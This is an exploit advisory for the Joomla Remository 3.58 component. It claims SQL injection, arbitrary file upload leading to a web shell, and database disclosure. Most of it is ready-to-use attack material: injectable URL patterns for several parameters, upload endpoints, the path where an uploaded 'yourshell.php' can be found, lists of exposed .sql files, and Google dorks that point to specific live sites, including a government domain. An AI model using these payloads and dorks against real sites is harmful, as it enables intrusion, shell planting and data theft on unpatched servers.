Joomla Remository component version 3.58 suffers from database disclosure, remote shell upload, and remote SQL injection vulnerabilities.
0b8a3fd3fb2c96d845763215df15bf6230cd38540015adf11d9101520ce038cb
####################################################################
# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010284
packetstormsecurity.com/files/151433/Joomla-Remository-3.58-Database-Disclosure-Shell-Upload-SQL-Injection.html
####################################################################
# Description about Software :
***************************
Remository is open source software for Joomla.
####################################################################
# Impact :
***********
*Attackers can exploit this issue via a browser.
The 'com_remository' component for Joomla! is prone to a vulnerability that lets attackers
upload arbitrary files/shell upload because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the
context of the webserver process. This may facilitate unauthorized access or
privilege escalation; other attacks are also possible.
* An attacker might be able inject and/or alter existing
SQL statements which would influence the database exchange.
* SQL injection vulnerability in the Joomla Remository Components 3.58 because,
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
* Exploiting this issue could allow an attacker to compromise the application, read,
access or modify data, or exploit latent vulnerabilities in the underlying database.
If the webserver is misconfigured, read & write access to the filesystem may be possible.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?option=com_remository&Itemid=[SQL Injection]
/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=
[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=
[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]
####################################################################
# Arbitrary File Upload Exploit :
****************************
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles
/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]
/index.php/shared-file-repository/func-addmanyfiles/
Directory File Path :
******************
Search your file here.
/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php
/components/com_remository_files/......
Note : If websites are not vulnerable it says ;
You have no permitted upload categories - please refer to the webmaster
####################################################################
# Database Disclosure Exploit :
***************************
/administrator/components/com_remository/assignment.sql
/administrator/components/com_remository/blob.sql
/administrator/components/com_remository/containers.sql
/administrator/components/com_remository/file.sql
/administrator/components/com_remository/log.sql
/administrator/components/com_remository/permission.sql
/administrator/components/com_remository/repository.sql
/administrator/components/com_remository/reviews.sql
/administrator/components/com_remository/structure.sql
/administrator/components/com_remository/text.sql
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################